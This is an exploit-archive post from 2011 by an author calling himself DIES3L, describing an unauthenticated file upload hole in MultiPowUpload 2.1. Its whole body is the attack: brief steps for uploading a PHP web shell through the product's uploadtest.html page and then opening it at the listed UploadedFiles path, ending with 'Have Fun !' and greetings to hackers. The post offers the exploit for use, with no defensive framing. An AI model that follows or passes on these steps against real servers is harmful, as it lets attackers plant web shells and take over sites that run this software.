MultiPowUpload v 2.1 Remote File Upload Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MultiPowUpload v 2.1 Remote File Upload Vulnerability
# Published : 2011-01-26
# Author : DIES3L
# Previous Title : PMB Services <= 3.4.3 SQL Injection Vunerability
# Next Title : vBSEO 3.5.2 & 3.2.2 - Persistent XSS via LinkBacks

[#] Exploit Title:  MultiPowUpload v 2.1 Remote File Upload Vulnerability
[#] Author: DIES3L
[#] Email: zxn@Hotmail.Com
[#] Date: 26-1-2011
[#] Software Link: http://www.element-it.com
[#] Download Software : http://www.element-it.com/Download/ElementIT.MultiPowUpload3.zip
[#] Version: 2.1
[#] Tested on: LiNuX

======================

[-- Exploit --]
http://localhost/[path]/uploadtest.html

+ Click Browse Then Chose Your File [SHELL.php]
+ Your Shell Here :
http://localhost/[path]/FileProcessingScripts/PHP/UploadedFiles/[SHELL.php]

Have Fun !
======================

[-- Greetz To --]
ALL H4ck4rs FroM s4uD1 Ar4b!a ..

======================